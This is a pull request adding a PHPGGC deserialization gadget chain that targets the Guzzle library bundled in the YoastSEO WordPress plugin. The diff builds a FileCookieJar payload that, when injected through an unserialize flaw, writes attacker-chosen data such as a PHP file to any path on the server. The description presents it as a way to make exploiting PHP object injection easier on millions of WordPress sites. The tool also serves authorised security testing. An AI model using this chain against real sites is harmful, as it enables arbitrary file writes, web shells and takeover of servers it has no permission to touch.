### PR TITLE
WordPress/P/YoastSEO/FW1

### DIFF
--- a/gadgetchains/WordPress/P/YoastSeo/FW/1/chain.php
+++ b/gadgetchains/WordPress/P/YoastSeo/FW/1/chain.php
@@ -1,0 +1,21 @@
+<?php
+
+namespace GadgetChain\WordPress\P\YoastSEO;
+
+class FW1 extends \PHPGGC\GadgetChain\FileWrite
+{
+    public static $version = '19.0 <= 24.9+';
+    public static $vector = '__destruct';
+    public static $author = 'whattheslime';
+    public static $information = "If you're writing a php file, don't forget to add `?>` at the end of the file 
+    to close the php `<?php` tag to avoid errors, as there will be garbage in the 
+    destination file.";
+
+    public function generate(array $parameters)
+    {
+        $path = $parameters['remote_path'];
+        $data = $parameters['data'];
+
+        return new \YoastSEO_Vendor\GuzzleHttp\Cookie\FileCookieJar($path, $data);
+    }
+}

--- a/gadgetchains/WordPress/P/YoastSeo/FW/1/gadgets.php
+++ b/gadgetchains/WordPress/P/YoastSeo/FW/1/gadgets.php
@@ -1,0 +1,41 @@
+<?php
+
+namespace YoastSEO_Vendor\GuzzleHttp\Cookie
+{
+    class SetCookie
+    {
+        private $data;
+
+        public function __construct($data)
+        {
+            $this->data = [
+                'Expires' => 1,
+                'Discard' => false,
+                'Value' => $data
+            ];
+        }
+    }
+
+    class CookieJar
+    {
+        private $cookies = [];
+        private $strictMode;
+
+        public function __construct($data)
+        {
+            $this->cookies = [new SetCookie($data)];
+        }
+    }
+
+    class FileCookieJar extends CookieJar
+    {
+        private $filename;
+        private $storeSessionCookies = true;
+
+        public function __construct($filename, $data)
+        {
+            parent::__construct($data);
+            $this->filename = $filename; 
+        }
+    }
+}


### PR DESCRIPTION
## Summary

This pull request adds a new gadget chain targeting the Guzzle library, which is a dependency of [YoastSEO](https://github.com/Yoast/wordpress-seo) — one of the most popular plugins on [WordPress](https://wordpress.org/).

## Details

YoastSEO bundles the [Guzzle HTTP client](https://docs.guzzlephp.org/en/stable/), which includes a [known gadget chain](https://github.com/ambionics/phpggc/tree/master/gadgetchains/Guzzle/FW/1) that enables arbitrary file writes on the remote server.

## Motivation

The goal of this contribution is to provide a highly generic gadget chain for exploiting PHP object injection vulnerabilities in WordPress plugin environments.

Given YoastSEO’s massive install base (approximately 10 million active installations), the presence of this gadget can greatly reduce the complexity of exploiting deserialization vulnerabilities in a wide range of WordPress setups.

## Testing

The gadget has been successfully tested in a realistic scenario, using a vulnerable plugin installed alongside the YoastSEO plugin.
